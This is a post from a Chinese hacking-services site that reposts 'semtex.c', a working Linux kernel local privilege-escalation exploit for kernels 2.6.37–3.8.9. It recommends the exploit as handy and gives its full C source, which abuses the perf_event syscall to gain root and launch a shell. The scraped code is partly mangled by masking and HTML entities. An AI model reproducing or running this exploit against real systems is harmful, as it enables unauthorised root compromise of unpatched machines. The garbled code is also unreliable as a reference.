找黑客平台

国外黑客发现Linux 内核2.6.37-3.8.9版本一个漏洞

hacker4年前黑客文章1087

国外黑客发现Linux 内核2.6.37-3.8.9版本一个漏洞,成功利用该漏洞可能获得特权用户,还算新鲜,转来给大家看看。比较好用的~


http:// *** sheep.org/~sd/warez/semtex.c

linux 2.6.37-3.x.x x86_64, ~100 LOC

 

/*
 * linux 2.6.37-3.x.x x86_64, ~100 LOC
 * gcc-4.6 -O2 semtex.c && ./a.out
 * 2010 sd@ *** sheep.org, salut!
 *
 * update may 2013:
 * seems like centos 2.6.32 backported the perf bug, lol.
 * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.
 */
 
#define _GNU_SOURCE 1
#include <stdint .h>
#include <stdio .h>
#include <stdlib .h>
#include <string .h>
#include <unistd .h>
#include <sys /mman.h>
#include <syscall .h>
#include <stdint .h>
#include <assert .h>
 
#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000
#define AB(x) ((uint64_t)((0xababababLL< &lt;32)^((uint64_t)((x)*313337))))
 
void *** () {
int i,j,k;
uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
uint64_t kbase = ((uint64_t)current)>>36;
uint32_t *fixptr = (void*) AB(1);
*fixptr = -1;
 
for (i=0; i&lt;4000; i+=4) {
uint64_t *p = (void *)&current[i];
uint32_t *t = (void*) p[0];
if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
for (j=0; j&lt;20; j++) { for (k = 0; k < 8; k++)
if (((uint32_t*)uids)[k] != t[j+k]) goto next;
for (i = 0; i < 8; i++) t[j+i] = 0;
for (i = 0; i < 10; i++) t[j+9+i] = -1;
return;
next:; }
}
}
 
void sheep(uint32_t off) {
uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
int fd = syscall(298, buf, 0, -1, -1, 0);
assert(!close(fd));
}
 
int main() {
uint64_t  u,g,needle, kbase, *p; uint8_t *code;
uint32_t *map, j = 5;
int i;
struct {
uint16_t limit;
uint64_t addr;
} __attribute__((packed)) idt;
assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
memset(map, 0, SIZE);
sheep(-1); sheep(-2);
for (i = 0; i < SIZE/4; i++) if (map[i]) {
assert(map[i+1]);
break;
}
assert(i<SIZE/4);
a *** ("sidt %0" : "=m" (idt));
kbase = idt.addr & 0xff000000;
u = getuid(); g = getgid();
assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, & *** , 1024);
memcpy(code-13,"\x0f\x01\xf8\xe8\5\x0f\x01\xf8\x48\xcf",
printf("2.6.37-3.x x86_64\nsd@ *** sheep.org 2010\n") % 27);
setresuid(u,u,u); setresgid(g,g,g);
while (j--) {
needle = AB(j+1);
assert(p = memmem(code, 1024, &needle, 8));
if (!p) continue;
*p = j?((g<&lt;32)|u):(idt.addr + 0x48);
}
sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
a *** ("int $0x4"); assert(!setuid(0));
return execl("/bin/bash", "-sh", NULL);
}
标签: 黑客技术
返回列表

上一篇:Cisco环境解决ARP欺骗问题

下一篇:什么是电脑肉鸡_电脑肉鸡是什么意思

相关文章

Kismac是不是适用全部电脑操作系统?

Kismac是不是适用全部电脑操作系统?

什么叫Kismac? KisMAC是wifi网络发觉黑客工具。虽然代码库是不一样的,但这类时兴的无线网络拦路虎出示了其名字Kismet的好多个作用。这一专用工具出示了一个好看的GUI,而且在Kism...

如何成为一名黑客 什么啊什么Q 2018&amp;nbsp;&amp;nbsp;可以教你成为一名黑客的书

原文地址: http://fsecurify.com/how-to-learn-hacking/ 如何学习黑客技术?   这个问题我几乎每天都会在Quora、Facebook、Twitter和现实生活...

Thinkphp框架任意代码执行漏洞利用及修复

ThinkPHP是一个开源的PHP框架, 是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循 Apache...

网站渗透,教你让ATM机一直吐钱

网站渗透,教你让ATM机一直吐钱

去年夏天,一名土尔其中国公民Ercan Findikoglu被引渡回国到英国,而现阶段,他将遭遇着纽约市审判长明确提出的18项罪行控告。   土尔其近些...

Aircrack

Aircrack

什么是Aircrack-ng? Aircrack-ng是一个互联网黑客工具,由一个排序嗅探器,探测器,WPA / WPA2-PSK破解器,WEP和用以802.11无线网络的分析工具构成。该专用工具适...

黑帽SEO真的黑吗?

黑帽SEO真的黑吗?

从事SEO的朋友应该对黑帽这个词并不陌生,有的甚至嗤之以鼻,有的避而远之,包括小马前段时间写的《一个菜鸟SEOer对白帽和黑帽SEO的理性思考》,也倡导大家要做白帽SEO,总之各有见解,难道黑帽S...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.